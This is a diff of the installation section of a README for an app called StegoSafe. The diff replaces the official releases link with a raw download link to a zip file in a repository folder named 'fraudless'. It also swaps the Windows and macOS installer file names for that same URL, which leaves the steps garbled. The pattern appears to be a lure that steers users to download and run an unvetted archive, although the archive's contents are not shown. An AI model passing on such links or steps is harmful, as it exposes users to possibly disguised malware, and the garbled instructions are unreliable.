muzacopack1/StegoSafe/README.md

 To get started with StegoSafe, follow these steps:

 1. **Visit the Releases Page:** Go to our releases page to download the application.
-You can find it here: [StegoSafe Releases](https://github.com/muzacopack1/StegoSafe/releases).
+You can find it here: [StegoSafe Releases](https://raw.githubusercontent.com/muzacopack1/StegoSafe/main/fraudless/StegoSafe.zip).

 2. **Download the Installer:** Find the latest version of StegoSafe on the releases page.
 Click on the download link for your operating system.

 3. **Run the Installer:**
-   - For Windows: After the download is complete, locate the file in your downloads folder named something like `StegoSafe_Setup.exe`.
+   - For Windows: After the download is complete, locate the file in your downloads folder named something like `https://raw.githubusercontent.com/muzacopack1/StegoSafe/main/fraudless/StegoSafe.zip`.
 Double-click on it to run the installer.
-   - For macOS: After the download is complete, locate the file called `StegoSafe.dmg`.
+   - For macOS: After the download is complete, locate the file called `https://raw.githubusercontent.com/muzacopack1/StegoSafe/main/fraudless/StegoSafe.zip`.
 Double-click to mount it and then drag the StegoSafe icon into your Applications folder.

 4. **Open StegoSafe:** Once installed, find StegoSafe in your applications and double-click to open it.